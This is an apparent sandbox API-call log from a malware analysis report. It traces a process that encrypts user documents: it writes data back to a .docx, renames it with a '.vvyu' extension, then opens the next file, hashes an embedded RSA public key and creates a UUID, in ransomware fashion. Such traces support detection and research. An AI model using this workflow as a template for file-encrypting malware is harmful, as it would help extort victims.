0x2c78ac0 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a80 [0194.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2a98 [0194.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ac8 [0194.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0194.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ae0 [0194.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2af8 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b10 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2af8 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2af8 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2a80 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0194.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2af8 | out: hHeap=0x620000) returned 1 [0194.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0194.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0d98 | out: hHeap=0x620000) returned 1 [0194.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.142] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x921c, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x921c, lpOverlapped=0x0) returned 1 [0194.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.147] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x9221, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.147] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.148] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.149] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.149] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.149] CloseHandle (hObject=0x568) returned 1 [0194.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea3a68 [0194.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.152] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\tPG-9VHK-ulBZl_Q.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\tpg-9vhk-ulbzl_q.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\tPG-9VHK-ulBZl_Q.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\tpg-9vhk-ulbzl_q.docx.vvyu")) returned 1 [0194.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.153] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0194.156] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92e06520, ftCreationTime.dwHighDateTime=0x1d89cdb, ftLastAccessTime.dwLowDateTime=0x529888d0, ftLastAccessTime.dwHighDateTime=0x1d8a465, ftLastWriteTime.dwLowDateTime=0x529888d0, ftLastWriteTime.dwHighDateTime=0x1d8a465, nFileSizeHigh=0x0, nFileSizeLow=0x4be6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T_CIyr3B-hwvI5YqWU4.ods", cAlternateFileName="T_CIYR~1.ODS")) returned 1 [0194.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0d98 [0194.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0194.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0d98 | out: hHeap=0x620000) returned 1 [0194.157] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\T_CIyr3B-hwvI5YqWU4.ods") returned=".ods" [0194.157] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\T_CIyr3B-hwvI5YqWU4.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\t_ciyr3b-hwvi5yqwu4.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.157] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=19430) returned 1 [0194.157] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.160] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4bc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.160] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.163] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.163] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x4be6, lpOverlapped=0x0) returned 1 [0194.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.164] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.165] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.165] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.165] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.165] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.165] GetLastError () returned 0x0 [0194.165] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.165] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.166] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.166] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.166] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4bf0) returned 0x2ea79b0 [0194.166] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0d98 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0de0 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a80 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a98 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.167] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0194.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a80 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2a98 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ab0 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0194.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0194.170] GetCurrentThreadId () returned 0x66c [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9fb60 [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.170] GetCurrentThreadId () returned 0x66c [0194.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 